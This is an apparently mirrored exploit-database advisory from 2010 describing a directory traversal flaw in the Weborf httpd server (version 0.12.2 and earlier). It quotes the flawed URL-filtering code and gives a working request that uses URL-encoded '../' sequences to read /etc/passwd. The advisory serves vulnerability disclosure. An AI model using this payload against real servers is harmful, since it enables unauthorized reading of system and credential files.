weborf 0.12.2 – Directory Traversal

• Exploit Database
• 104 阅读

• 作者： Rew
  日期： 2010-09-07
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/14925/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability Date: Sep 6, 2010 Author: Rew Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php Version: 0.12.2 Tested On: Debian 5 CVE: N/A   =============================================================   Weborf httpd <= 0.12.2 suffers a directory traversal vulnerability.This vulnerability could allow attackers to read arbitrary files and hak th3 plan3t.   instance.c : line 240-244 ------------------------------ void modURL(char* url) { //Prevents the use of .. to access the whole filesystem<-- ORLY? strReplace(url,"../",&apos;\0&apos;);   replaceEscape(url); ------------------------------   Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd   ==============================================================   Stay safe, Over and Out